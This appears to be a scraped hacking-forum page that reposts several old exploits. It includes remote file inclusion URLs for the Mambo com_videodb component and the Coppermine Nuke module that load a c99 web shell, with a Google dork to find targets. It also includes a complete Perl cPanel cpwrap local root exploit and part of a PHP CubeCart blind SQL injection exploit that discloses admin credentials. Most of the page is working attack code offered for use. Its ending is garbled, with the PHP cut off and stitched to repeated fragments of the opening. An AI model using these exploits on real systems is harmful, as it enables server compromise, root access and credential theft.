om_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download odb_v0.3en.zip bug found in file : core/videodb.class.xml.php global $mosConfig_absolute_path; require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); exploit: http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosC onfig_absolute_path=[shell] Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink baby_hacker(HCE) coppermine (nuke module) RFI vul search google: Code: allinurl:modules.php?name=coppermine xploit: Code: <server>/modules/coppermine/themes/default/theme.php?THEME_DIR=c99 <server>/modules/coppermine/include/init.inc.php?CPG_M_DIR=c99 Black_hat_cr(HCE) cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit - Cái này hay à Trích: #!/usr/bin/perl -w # 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin # use strict; # haha oh wait my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; my $pwd = `pwd`; chomp $pwd; $ENV{'PERL5LIB'} = "$pwd"; if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; } if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; } if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; while(<CPWRAP>) { if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } } close (CPWRAP); open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n"; print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\" /bin/bash\\\\\\\");}\";\n"; print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n"; print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n"; print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n"; close (STRICT); system("$mysqlwrap DUMPMYSQL 2>/dev/null"); if ( -e "Maildir" ) { system("./Maildir"); } else { unlink "strict.pm"; die "Failed\n"; } # milw0rm.com [2006-10-01] navaro(HCE) CubeCart <= 3.0.11 disclosure exploit Tên bug: CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials Code: #!/usr/bin/php -q -d short_open_tag=on <? print_r(' CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials disclosure exploit by rgod rgod@autistici.org site: http://retrogod.altervista.org dork: "Copyright Devellion Limited 2005. All rights reserved." -> this works against MySQL >=4.1 (allowing subs) '); /* short explaination: software site: http://www.cubecart.com/site/home/ same kind of sql injection of http://retrogod.altervista.org/cubecart_3011_sql.html but this bypass magic_quotes_gpc=On because of base64_decode() function used in /modules/gateway/Protx/confirmed.php used near lines: if($success == TRUE){ $cart_order_id = base64_decode($_GET['oid']); include_once(" / / /includes/orderSuccess.inc.php"); $result = "?pg=".base64_encode("Protx"); } else { */ if ($argc<3) { print_r(' Usage: php '.$argv[0].' host path OPTIONS host: target server (ip/hostname) path: path to CubeCart Options: -T[prefix]: specify a table prefix different from default (CubeCart_) -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy -a adjust the first argument to pass to benchamrk() function -s: use sleep() (this function was added in MySQL 5.0.12.) instead of benchmark() -d disclose table prefix (reccomended) Example: php '.$argv[0].' localhost /cubecart/ php '.$argv[0].' localhost /cubecart/ -a200000 -Tcube_ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { . ';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy "; $ock=fsockopen($parts[0],$parts[1]); if (!$ock). JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink baby _hacker( HCE) coppermine (nuke module) RFI vul search google:. Componenet <= 0.3en Remote Include Vulnerability Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download